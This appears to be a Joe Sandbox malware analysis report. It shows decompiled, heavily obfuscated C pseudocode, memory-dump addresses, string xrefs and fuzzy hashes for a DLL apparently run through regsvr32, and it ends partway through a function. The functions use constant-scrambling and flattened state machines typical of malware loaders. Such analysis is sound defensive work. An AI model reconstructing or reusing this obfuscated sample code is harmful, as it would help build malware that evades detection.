0x10003c23
0x10003c29
0x10003c2b
0x00000000
0x10003c2b
0x00000000
0x10003c29
0x10003bb8
0x10003bfd
0x10003c03
0x10003c08
0x10003c0d
0x10003c19
0x00000000
0x10003c0f
0x10003c0f
0x00000000
0x10003c0f
0x10003bba
0x10003bc0
0x00000000
0x10003c45
0x10003bc8
0x10003be5
0x10003beb
0x100039da
0x100039da
0x100039da
0x00000000
0x100039da
0x10003bca
0x10003bd0
0x10003bd2
0x00000000
0x10003bd2
0x10003bd0
0x10003bc8
0x00000000
0x10003bb8
0x100039e3
0x100039de

Strings

U$, xrefs: 10003677
z7, xrefs: 100037C9
x#m, xrefs: 1000395D
j<3, xrefs: 100035FE
io;>, xrefs: 1000389B
!G, xrefs: 100037A3
rP, xrefs: 10003715

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID: !G$U$$io;>$j<3$rP$x#m$z7
API String ID: 1725840886-2417781837
Opcode ID: 099d8ecda456356704ee8446c6787d00e34c8a31437ff84888e3f97a1ebdd39a
Instruction ID: ad1d1f47745e5aa7b8ab66cc2b5fb7eda7a98211d8dc26a73819b45834097beb
Opcode Fuzzy Hash: 099d8ecda456356704ee8446c6787d00e34c8a31437ff84888e3f97a1ebdd39a
Instruction Fuzzy Hash: AB0210729083809FE368CF65C486A4FBBE2FBC5348F10891DF9D996260D7B599498F43

Uniqueness

Uniqueness Score: -1.00%

Function 10006CBB Relevance: 9.0, Strings: 7, Instructions: 273
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E10006CBB() {
				char _v520;
				char _v1040;
				void* _v1052;
				intOrPtr _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				unsigned int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				signed int _v1160;
				signed int _v1164;
				signed int _v1168;
				void* _t304;
				void* _t305;
				void* _t308;
				void* _t314;
				signed int _t316;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				signed int _t323;
				signed int _t324;
				intOrPtr _t327;
				void* _t363;
				signed int* _t367;

				_t367 =  &_v1168;
				_v1056 = 0x4da416;
				asm("stosd");
				_t363 = 0x141b632;
				_t316 = 0x1b;
				asm("stosd");
				asm("stosd");
				_v1104 = 0x278132;
				_v1104 = _v1104 * 0x3b;
				_v1104 = _v1104 >> 0xb;
				_v1104 = _v1104 ^ 0x0002bbc2;
				_v1088 = 0xbde918;
				_v1088 = _v1088 >> 4;
				_v1088 = _v1088 ^ 0x0000f03c;
				_v1160 = 0xae7745;
				_v1160 = _v1160 << 7;
				_v1160 = _v1160 | 0x47b9f7e3;
				_v1160 = _v1160 + 0xffff029e;
				_v1160 = _v1160 ^ 0x57b55980;
				_v1144 = 0x4ba3d0;
				_v1144 = _v1144 / _t316;
				_v1144 = _v1144 + 0x97f8;
				_t317 = 0x7d;
				_v1144 = _v1144 / _t317;
				_v1144 = _v1144 ^ 0x00044016;
				_v1060 = 0x46eb66;
				_t318 = 0x57;
				_v1060 = _v1060 / _t318;
				_v1060 = _v1060 ^ 0x00099049;
				_v1064 = 0x9c8dad;
				_v1064 = _v1064 ^ 0x85b21bb9;
				_v1064 = _v1064 ^ 0x8520284f;
				_v1096 = 0xa108be;
				_v1096 = _v1096 << 3;
				_v1096 = _v1096 << 4;
				_v1096 = _v1096 ^ 0x508d9b09;
				_v1112 = 0x2c056e;
				_v1112 = _v1112 << 5;
				_v1112 = _v1112 + 0xa0bb;
				_v1112 = _v1112 ^ 0x058fd11c;
				_v1128 = 0xacac2c;
				_v1128 = _v1128 + 0x6555;
				_v1128 = _v1128 | 0x2a229314;
				_v1128 = _v1128 + 0xffff8671;
				_v1128 = _v1128 ^ 0x2aa116c0;
				_v1076 = 0x5afb26;
				_v1076 = _v1076 + 0x7220;
				_v1076 = _v1076 ^ 0x00533713;
				_v1068 = 0x62267d;
				_t319 = 0x16;
				_v1068 = _v1068 / _t319;
				_v1068 = _v1068 ^ 0x000d8e00;
				_v1136 = 0x3308e1;
				_v1136 = _v1136 * 0x35;
				_v1136 = _v1136 | 0x018131bf;
				_t320 = 0x4d;
				_v1136 = _v1136 / _t320;
				_v1136 = _v1136 ^ 0x0021beef;
				_v1152 = 0x3bc119;
				_v1152 = _v1152 >> 1;
				_t321 = 5;
				_v1152 = _v1152 * 0x17;
				_v1152 = _v1152 + 0x81c4;
				_v1152 = _v1152 ^ 0x02a03987;
				_v1080 = 0x27d921;
				_v1080 = _v1080 >> 0x10;
				_v1080 = _v1080 ^ 0x000b0f2a;
				_v1120 = 0xaef15;
				_v1120 = _v1120 ^ 0xe6992cdf;
				_v1120 = _v1120 ^ 0x718a3f3f;
				_v1120 = _v1120 ^ 0x97142461;
				_v1084 = 0xb36a8;
				_v1084 = _v1084 + 0xffff4ffb;
				_v1084 = _v1084 ^ 0x000d2691;
				_v1168 = 0x494d1b;
				_v1168 = _v1168 >> 0xd;
				_v1168 = _v1168 ^ 0xf651d4f4;
				_v1168 = _v1168 + 0xffff9f09;
				_v1168 = _v1168 ^ 0xf6562528;
				_v1164 = 0x73a1f8;
				_v1164 = _v1164 + 0xffffbbdd;
				_v1164 = _v1164 >> 2;
				_v1164 = _v1164 * 0x48;
				_v1164 = _v1164 ^ 0x08144c67;
				_v1140 = 0x4344fc;
				_v1140 = _v1140 >> 3;
				_v1140 = _v1140 ^ 0x46b5c363;
				_v1140 = _v1140 ^ 0xdda602c8;
				_v1140 = _v1140 ^ 0x9b1df596;
				_v1072 = 0x54d59;
				_v1072 = _v1072 + 0xffff3e78;
				_v1072 = _v1072 ^ 0x00079c50;
				_v1148 = 0x108210;
				_v1148 = _v1148 << 0xf;
				_v1148 = _v1148 + 0xffff3400;
				_v1148 = _v1148 ^ 0x0badbd6c;
				_v1148 = _v1148 ^ 0x4aa11904;
				_v1156 = 0x432ae7;
				_t322 = 0x4f;
				_v1156 = _v1156 / _t321;
				_v1156 = _v1156 * 0x78;
				_v1156 = _v1156 + 0xffff8db1;
				_v1156 = _v1156 ^ 0x064a4142;
				_v1100 = 0x8fa2c;
				_v1100 = _v1100 >> 7;
				_v1100 = _v1100 + 0x9f58;
				_v1100 = _v1100 ^ 0x0008e161;
				_v1108 = 0x1134df;
				_v1108 = _v1108 ^ 0x4262cab3;
				_v1108 = _v1108 + 0xfd05;
				_v1108 = _v1108 ^ 0x427f4649;
				_v1116 = 0x61686f;
				_t200 =  &_v1116; // 0x61686f
				_v1116 =  *_t200 * 0x35;
				_v1116 = _v1116 << 4;
				_v1116 = _v1116 ^ 0x42adf802;
				_v1124 = 0x6ca55a;
				_v1124 = _v1124 * 0x19;
				_v1124 = _v1124 << 4;
				_v1124 = _v1124 ^ 0x1d8e18a7;
				_v1124 = _v1124 ^ 0xb44a7541;
				_v1132 = 0xa1e3f4;
				_v1132 = _v1132 + 0xf90;
				_v1132 = _v1132 ^ 0x60cad5c3;
				_v1132 = _v1132 / _t322;
				_v1132 = _v1132 ^ 0x0132e6b8;
				_v1092 = 0x51de0f;
				_t323 = 0x61;
				_v1092 = _v1092 / _t323;
				_t324 = 0x22;
				_v1092 = _v1092 / _t324;
				_v1092 = _v1092 ^ 0x00039272;
				E1000588D(_t324);
				do {
					while(_t363 != 0x141b632) {
						if(_t363 == 0x209df62) {
							_push(_v1168);
							_push(_v1084);
							_push(_v1120);
							_t304 = E10004BB4(0x10001260, _v1080);
							_t305 = E1000F2B9();
							_t327 =  *0x10024208; // 0x49d848
							E10011BED(_v1072, __eflags,  *0x10024208,  &_v520, _t305, _t327 + 0x210, _t304, _v1148, _v1156, _t327 + 0x210);
							_t308 = E1000B9D7(_v1100, _v1108, _t304, _v1116);
							_t367 =  &(_t367[0xd]);
							_t363 = 0xd6b3f3d;
							continue;
						}
						if(_t363 == 0xb62c549) {
							_push(_v1060);
							_push(_v1144);
							_push(_v1160);
							E1001734A(_v1064, __eflags, _v1096, _v1112, _v1128,  &_v1040, E10004BB4(0x10001200, _v1088), _v1076, 0x10001200,  *0x10024208);
							_t308 = E1000B9D7(_v1068, _v1136, _t309, _v1152);
							_t367 =  &(_t367[0xd]);
							_t363 = 0x209df62;
							continue;
						}
						_t375 = _t363 - 0xd6b3f3d;
						if(_t363 != 0xd6b3f3d) {
							goto L10;
						}
						_t314 = E1002110E(_v1124, _v1132, _t375, _v1092,  &_v520,  &_v1040); // executed
						return _t314;
					}
					_t363 = 0xb62c549;
					L10:
					__eflags = _t363 - 0xf543eed;
				} while (__eflags != 0);
				return _t308;
			}

0x10006cbb
0x10006cc1
0x10006cd8
0x10006cd9
0x10006ce0
0x10006ce3
0x10006ce4
0x10006ce5
0x10006cf2
0x10006cf6
0x10006cfb
0x10006d03
0x10006d0b
0x10006d10
0x10006d18
0x10006d20
0x10006d25
0x10006d2d
0x10006d35
0x10006d3d
0x10006d4d
0x10006d51
0x10006d5d
0x10006d62
0x10006d68
0x10006d70
0x10006d82
0x10006d87
0x10006d90
0x10006d9b
0x10006da3
0x10006dab
0x10006db3
0x10006dbb
0x10006dc0
0x10006dc5
0x10006dcd
0x10006dd5
0x10006dda
0x10006de2
0x10006dea
0x10006df2
0x10006dfa
0x10006e02
0x10006e0a
0x10006e12
0x10006e1a
0x10006e22
0x10006e2a
0x10006e36
0x10006e3b
0x10006e3f
0x10006e47
0x10006e54
0x10006e58
0x10006e66
0x10006e6b
0x10006e71
0x10006e79
0x10006e81
0x10006e8a
0x10006e8d
0x10006e91
0x10006e99
0x10006ea1
0x10006ea9
0x10006eae
0x10006eb6
0x10006ebe
0x10006ec6
0x10006ece
0x10006ed6
0x10006ede
0x10006ee6
0x10006eee
0x10006ef6
0x10006efb
0x10006f03
0x10006f0b
0x10006f13
0x10006f1b
0x10006f23
0x10006f2d
0x10006f31
0x10006f39
0x10006f41
0x10006f46
0x10006f4e
0x10006f56
0x10006f5e
0x10006f66
0x10006f6e
0x10006f76
0x10006f7e
0x10006f83
0x10006f8b
0x10006f93
0x10006f9b
0x10006fa9
0x10006faa
0x10006fb3
0x10006fb7
0x10006fbf
0x10006fc7
0x10006fcf
0x10006fd4
0x10006fdc
0x10006fe4
0x10006fec
0x10006ff4
0x10006ffc
0x10007004
0x1000700c
0x10007011
0x10007015
0x1000701a
0x10007022
0x1000702f
0x10007033
0x10007038
0x10007040
0x10007048
0x10007050
0x10007058
0x1000706a
0x10007070
0x10007078
0x10007084
0x10007089
0x10007093
0x10007096
0x1000709a
0x100070a6
0x100070ba
0x100070ba
0x100070c8
0x1000717f
0x10007188
0x1000718c
0x10007194
0x100071a2
0x100071a7
0x100071d5
0x100071e7
0x100071ec
0x100071ef
0x00000000
0x100071ef
0x100070d0
0x10007109
0x10007112
0x10007116
0x1000715b
0x10007170
0x10007175
0x10007178
0x00000000
0x10007178
0x100070d2
0x100070d4
0x00000000
0x00000000
0x100070f6
0x00000000
0x100070fb
0x100071f6
0x100071f8
0x100071f8
0x100071f8
0x00000000

Strings

oha, xrefs: 1000700C
}&b, xrefs: 10006E2A
=?k, xrefs: 100070B5
Ue, xrefs: 10006DF2
r, xrefs: 10006E1A
fF, xrefs: 10006D70
*C, xrefs: 10006F9B

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: r$=?k$Ue$fF$oha$}&b$*C
API String ID: 0-1454134623
Opcode ID: 124744635fd54f0da888aa795c26ccdee087d6c30dc8bd603bba38997bd717ee
Instruction ID: 28cb71d3a25a24164f50b66c66b82fbdd038f7b65bdb35a84fb7c3050e997572
Opcode Fuzzy Hash: 124744635fd54f0da888aa795c26ccdee087d6c30dc8bd603bba38997bd717ee
Instruction Fuzzy Hash: BBD120715093409FE368CF22C98A54BBBF2FBC4748F108A1DF6A986260D7B59959CF43

Uniqueness

Uniqueness Score: -1.00%

Function 10010418 Relevance: 7.7, Strings: 6, Instructions: 236
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E10010418() {
				char _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				unsigned int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _t233;
				void* _t235;
				intOrPtr _t242;
				intOrPtr _t247;
				void* _t249;
				intOrPtr _t257;
				intOrPtr _t267;
				signed int _t272;
				signed int _t273;
				signed int _t274;
				void* _t276;
				signed int* _t278;
				void* _t281;

				_t278 =  &_v620;
				_v604 = 0x2233d9;
				_v604 = _v604 | 0x56fc7936;
				_t249 = 0x5b1878;
				_v604 = _v604 + 0xffff7c79;
				_v604 = _v604 >> 0xe;
				_v604 = _v604 ^ 0x00015beb;
				_v608 = 0x6c84d5;
				_v608 = _v608 >> 5;
				_v608 = _v608 + 0xa1b3;
				_v608 = _v608 + 0x7712;
				_v608 = _v608 ^ 0x00047cc2;
				_v532 = 0x474030;
				_v532 = _v532 + 0x4d21;
				_v532 = _v532 ^ 0x00488d6e;
				_v612 = 0x42198a;
				_v612 = _v612 | 0xc0639734;
				_v612 = _v612 << 0xc;
				_v612 = _v612 << 0xa;
				_v612 = _v612 ^ 0xef800000;
				_v544 = 0xa36465;
				_v544 = _v544 >> 1;
				_v544 = _v544 ^ 0x005ef178;
				_v580 = 0x1d9397;
				_v580 = _v580 << 0x10;
				_v580 = _v580 + 0x9bbc;
				_v580 = _v580 ^ 0x939088fb;
				_v616 = 0x5d16bc;
				_v616 = _v616 + 0xd252;
				_t272 = 0x7a;
				_v616 = _v616 / _t272;
				_v616 = _v616 + 0xffff6108;
				_t276 = 0;
				_v616 = _v616 ^ 0x0008df98;
				_v620 = 0xe5a1d6;
				_v620 = _v620 + 0xffff461f;
				_v620 = _v620 << 8;
				_v620 = _v620 | 0x383dd3d0;
				_v620 = _v620 ^ 0xfcf86cba;
				_v564 = 0x2fcf88;
				_v564 = _v564 ^ 0x897caa9f;
				_t273 = 0x1e;
				_v564 = _v564 / _t273;
				_v564 = _v564 ^ 0x049b32ed;
				_v572 = 0xcce19c;
				_v572 = _v572 >> 6;
				_v572 = _v572 + 0x1c47;
				_v572 = _v572 ^ 0x0001d5b1;
				_v588 = 0xd4904c;
				_v588 = _v588 >> 1;
				_v588 = _v588 << 6;
				_v588 = _v588 + 0x3c57;
				_v588 = _v588 ^ 0x1a9d1d1d;
				_v548 = 0x86aea1;
				_v548 = _v548 + 0xffffce57;
				_v548 = _v548 + 0xffff75fc;
				_v548 = _v548 ^ 0x008352ba;
				_v528 = 0xa15148;
				_v528 = _v528 + 0xffff27a8;
				_v528 = _v528 ^ 0x00ac009f;
				_v596 = 0xa79177;
				_v596 = _v596 + 0xba76;
				_v596 = _v596 + 0xffff1ec6;
				_v596 = _v596 | 0xe190d311;
				_v596 = _v596 ^ 0xe1b62ab3;
				_v568 = 0x62a626;
				_v568 = _v568 << 6;
				_v568 = _v568 | 0x3575f950;
				_v568 = _v568 ^ 0x3df5388a;
				_v560 = 0x99508f;
				_v560 = _v560 + 0xffffc00f;
				_v560 = _v560 + 0xe872;
				_v560 = _v560 ^ 0x009fc165;
				_v552 = 0x865e5b;
				_v552 = _v552 >> 0xa;
				_v552 = _v552 << 0xf;
				_v552 = _v552 ^ 0x10ca5b33;
				_v540 = 0xeb11cc;
				_v540 = _v540 + 0xffffa0b7;
				_v540 = _v540 ^ 0x00e757b3;
				_v600 = 0x981d34;
				_v600 = _v600 ^ 0x1389b198;
				_v600 = _v600 + 0x9b1d;
				_v600 = _v600 + 0xc828;
				_v600 = _v600 ^ 0x13112286;
				_v556 = 0x85fd0e;
				_t274 = 0x7b;
				_v556 = _v556 * 0x33;
				_v556 = _v556 << 5;
				_v556 = _v556 ^ 0x5625634a;
				_v536 = 0xebf050;
				_v536 = _v536 + 0x8c59;
				_v536 = _v536 ^ 0x00e42f22;
				_v584 = 0x561e49;
				_v584 = _v584 * 0x51;
				_v584 = _v584 >> 4;
				_v584 = _v584 * 0x50;
				_v584 = _v584 ^ 0x883d1453;
				_v576 = 0xb7c5ae;
				_t275 = _v524;
				_v576 = _v576 / _t274;
				_v576 = _v576 + 0x8a30;
				_v576 = _v576 ^ 0x00037866;
				_v592 = 0xf1347e;
				_v592 = _v592 << 0xb;
				_v592 = _v592 << 0xd;
				_v592 = _v592 >> 0xa;
				_v592 = _v592 ^ 0x0017298d;
				while(1) {
					_t281 = _t249 - 0xc0f1c7d;
					if(_t281 > 0) {
						goto L12;
					}
					L2:
					if(_t281 == 0) {
						_t267 =  *0x10024208; // 0x49d848
						E100166C2(_v528, _t267, _v596, _v612, _t249, _t249, _v524, _v568, _v560, _v552); // executed
						_t278 =  &(_t278[8]);
						_t249 = 0xbf2cf91;
						_t235 = 1;
						_t276 =  ==  ? _t235 : _t276;
						continue;
						do {
							while(1) {
								_t281 = _t249 - 0xc0f1c7d;
								if(_t281 > 0) {
									goto L12;
								}
								goto L2;
							}
							goto L12;
							L20:
						} while (_t249 != 0x3b8d2e4);
						L23:
						return _t276;
					}
					if(_t249 == 0x5b1878) {
						_push(_t249);
						 *0x10024208 = E1001EAA3(0x440);
						_t249 = 0xd9c968f;
						continue;
					}
					if(_t249 == 0x38c82d6) {
						E10009574(_v540,  &_v520, _v600, _v556);
						_t242 = E100140AF(_v536, _v584, _v576,  &_v520, _v592);
						_t257 =  *0x10024208; // 0x49d848
						 *((intOrPtr*)(_t257 + 0x428)) = _t242;
						goto L23;
					}
					if(_t249 == 0xb14b536) {
						E1001A98E(_v572, _v588, _t275, _v548); // executed
						L9:
						_t249 = 0xc0f1c7d;
						continue;
					}
					if(_t249 != 0xbf2cf91) {
						goto L20;
					}
					E10004E77();
					_t249 = 0x38c82d6;
					continue;
					L12:
					if(_t249 == 0xcd18d8a) {
						_t249 = 0xb14b536;
						_v524 = _v608;
						goto L20;
					}
					if(_t249 == 0xd9c968f) {
						_push(_t249);
						_t233 = E100032B5(_v616, _v620, _v532, _t249, _v564); // executed
						_t275 = _t233;
						_t278 =  &(_t278[4]);
						if(_t233 == 0) {
							_t249 = 0xe0d046a;
						} else {
							_t247 =  *0x10024208; // 0x49d848
							 *((intOrPtr*)(_t247 + 0x420)) = 1;
							_t249 = 0xcd18d8a;
						}
						continue;
					}
					if(_t249 != 0xe0d046a) {
						goto L20;
					}
					_v524 = _v604;
					goto L9;
				}
			}

0x10010418
0x10010422
0x1001042c
0x10010434
0x10010439
0x10010441
0x10010446
0x1001044e
0x10010456
0x1001045b
0x10010463
0x1001046b
0x10010473
0x1001047b
0x10010483
0x1001048b
0x10010493
0x1001049b
0x100104a0
0x100104a5
0x100104ad
0x100104b5
0x100104b9
0x100104c1
0x100104c9
0x100104ce
0x100104d6
0x100104de
0x100104e6
0x100104f4
0x100104f9
0x100104ff
0x10010507
0x10010509
0x10010511
0x10010519
0x10010521
0x10010526
0x1001052e
0x10010536
0x1001053e
0x1001054a
0x1001054d
0x10010551
0x10010559
0x10010561
0x10010566
0x1001056e
0x10010576
0x1001057e
0x10010582
0x10010587
0x1001058f
0x10010597
0x1001059f
0x100105a7
0x100105af
0x100105b7
0x100105bf
0x100105c7
0x100105cf
0x100105d7
0x100105df
0x100105e7
0x100105ef
0x100105f7
0x100105ff
0x10010604
0x1001060c
0x10010614
0x1001061c
0x10010626
0x10010633
0x10010640
0x10010648
0x1001064d
0x10010652
0x1001065a
0x10010662
0x1001066a
0x10010672
0x1001067a
0x10010682
0x1001068a
0x10010692
0x1001069a
0x100106a9
0x100106aa
0x100106ae
0x100106b3
0x100106bb
0x100106c3
0x100106cb
0x100106d3
0x100106e0
0x100106e4
0x100106ee
0x100106f2
0x100106fa
0x10010708
0x1001070c
0x10010710
0x10010718
0x10010720
0x10010728
0x1001072d
0x10010732
0x10010737
0x1001073f
0x1001073f
0x10010741
0x00000000
0x00000000
0x10010747
0x10010747
0x100107c8
0x100107d5
0x100107da
0x100107dd
0x100107e6
0x100107e7
0x100107ea
0x1001073f
0x1001073f
0x1001073f
0x10010741
0x00000000
0x00000000
0x00000000
0x10010741
0x00000000
0x10010863
0x10010863
0x100108b4
0x100108bf
0x100108bf
0x1001074f
0x10010796
0x100107a2
0x100107a7
0x00000000
0x100107a7
0x10010753
0x10010882
0x1001089f
0x100108a4
0x100108ad
0x00000000
0x100108ad
0x1001075f
0x10010783
0x1001078a
0x1001078a
0x00000000
0x1001078a
0x10010767
0x00000000
0x00000000
0x1001076d
0x10010772
0x00000000
0x100107ef
0x100107f5
0x1001085a
0x1001085f
0x00000000
0x1001085f
0x100107fd
0x10010814
0x10010826
0x1001082b
0x1001082d
0x10010832
0x1001084c
0x10010834
0x10010834
0x1001083c
0x10010842
0x10010842
0x00000000
0x10010832
0x10010805
0x00000000
0x00000000
0x1001080b
0x00000000
0x1001080b

Strings

r, xrefs: 10010626
W<, xrefs: 10010587
Jc%V, xrefs: 100106B3
!M, xrefs: 1001047B
0@G, xrefs: 10010473
"/, xrefs: 100106CB

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: !M$"/$0@G$Jc%V$W<$r
API String ID: 0-2250489904
Opcode ID: cbec2f59d47afbb70fce847acacb6ecc8423e4fb8a6fe8c376ebb42ef450c764
Instruction ID: 6a3ce9b71e2559b252d634b9711256a5e5895835d322e58aed8992be1d6b60d9
Opcode Fuzzy Hash: cbec2f59d47afbb70fce847acacb6ecc8423e4fb8a6fe8c376ebb42ef450c764
Instruction Fuzzy Hash: 35B12D726083409BD398CF61D58941FBBE1FB94758F608A1DF2D68A2A0C7B5D989CF42

Uniqueness

Uniqueness Score: -1.00%

Function 1000D346 Relevance: 7.6, Strings: 6, Instructions: 114
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 87%

			E1000D346(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char _v592;
				void* _t124;
				void* _t141;
				signed int _t143;
				signed int _t144;
				signed int _t145;

				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10009E7D(_t124);
				_v64 = _v64 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v72 = 0x7fe462;
				_v68 = 0x45a850;
				_v40 = 0xd9cda9;
				_v40 = _v40 << 6;
				_v40 = _v40 ^ 0x367d16da;
				_v32 = 0x131e22;
				_v32 = _v32 >> 3;
				_v32 = _v32 >> 7;
				_v32 = _v32 ^ 0x000f53ac;
				_v36 = 0xb0b148;
				_v36 = _v36 ^ 0xc9b15c05;
				_t143 = 3;
				_v36 = _v36 / _t143;
				_v36 = _v36 ^ 0x43030963;
				_v56 = 0x988e8d;
				_v56 = _v56 + 0x4859;
				_v56 = _v56 ^ 0x009f4674;
				_v12 = 0x857fe6;
				_t144 = 0x4f;
				_v12 = _v12 * 0x47;
				_v12 = _v12 * 0x33;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 ^ 0x001715fd;
				_v8 = 0xd58d25;
				_v8 = _v8 * 0xa;
				_v8 = _v8 | 0x44ecef5a;
				_v8 = _v8 ^ 0x4cf5f7a4;
				_v16 = 0x6d094c;
				_v16 = _v16 + 0xffff6f75;
				_v16 = _v16 * 3;
				_v16 = _v16 * 0x3f;
				_v16 = _v16 ^ 0x501d6539;
				_v44 = 0x250972;
				_v44 = _v44 ^ 0x603b63be;
				_v44 = _v44 ^ 0x601e2e03;
				_v28 = 0x7d3044;
				_v28 = _v28 << 0xa;
				_v28 = _v28 + 0xbfc3;
				_v28 = _v28 ^ 0xf4c55166;
				_v52 = 0x3a7863;
				_v52 = _v52 + 0xfffffe98;
				_v52 = _v52 ^ 0x003e8540;
				_v24 = 0x3426f4;
				_v24 = _v24 + 0xffff4756;
				_v24 = _v24 / _t144;
				_v24 = _v24 ^ 0x000da6a6;
				_v20 = 0xf1d209;
				_v20 = _v20 | 0x9c940b5e;
				_t145 = 0x74;
				_v20 = _v20 / _t145;
				_v20 = _v20 * 0xa;
				_v20 = _v20 ^ 0x0d8740f2;
				_v48 = 0x9a0986;
				_v48 = _v48 + 0xb476;
				_v48 = _v48 ^ 0x009b0868;
				_push(_v56);
				_push(_v36);
				_push(_v32);
				E1000FD5F( &_v592, _v48, _v8, _v16, E10004BB4(0x10001744, _v40), _a4);
				E1000B9D7(_v44, _v28, _t138, _v52);
				_t141 = E10009EA8( &_v592, _v24, _v20, _v48); // executed
				return _t141;
			}

0x1000d350
0x1000d353
0x1000d356
0x1000d357
0x1000d358
0x1000d35d
0x1000d363
0x1000d367
0x1000d36e
0x1000d375
0x1000d37c
0x1000d380
0x1000d387
0x1000d38e
0x1000d392
0x1000d396
0x1000d39d
0x1000d3a4
0x1000d3b0
0x1000d3b5
0x1000d3ba
0x1000d3c1
0x1000d3c8
0x1000d3cf
0x1000d3d6
0x1000d3e1
0x1000d3e4
0x1000d3eb
0x1000d3ee
0x1000d3f2
0x1000d3f9
0x1000d404
0x1000d407
0x1000d40e
0x1000d415
0x1000d41c
0x1000d427
0x1000d42e
0x1000d431
0x1000d438
0x1000d43f
0x1000d446
0x1000d44d
0x1000d454
0x1000d458
0x1000d45f
0x1000d466
0x1000d46d
0x1000d474
0x1000d47b
0x1000d482
0x1000d490
0x1000d493
0x1000d49a
0x1000d4a1
0x1000d4ab
0x1000d4ae
0x1000d4b5
0x1000d4b8
0x1000d4bf
0x1000d4c6
0x1000d4cd
0x1000d4d4
0x1000d4dc
0x1000d4df
0x1000d502
0x1000d511
0x1000d525
0x1000d531

Strings

cx:, xrefs: 1000D466
D0}, xrefs: 1000D44D
YH, xrefs: 1000D3C8
r%, xrefs: 1000D438
Lm, xrefs: 1000D415
ZD, xrefs: 1000D407

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID: D0}$Lm$YH$ZD$cx:$r%
API String ID: 4033686569-3548761854
Opcode ID: 0534e3848c8994335fc5b539293c34b443921f1011ea5cdcc60d2b910dc1ee33
Instruction ID: 83d819f078cd85aa6eb901ed16699d8807d657182758595952817a560cbc6d0d
Opcode Fuzzy Hash: 0534e3848c8994335fc5b539293c34b443921f1011ea5cdcc60d2b910dc1ee33
Instruction Fuzzy Hash: 995120B5C0121DEBCF08CFA1D94A9EEFBB1FB48304F208149E5257A260D7B95A49CF94

Uniqueness

Uniqueness Score: -1.00%

Function 1000BE09 Relevance: 6.5, Strings: 5, Instructions: 290
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E1000BE09() {
				char _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				signed int _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				char _v572;
				intOrPtr _v576;
				char _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				signed int _v684;
				signed int _v688;
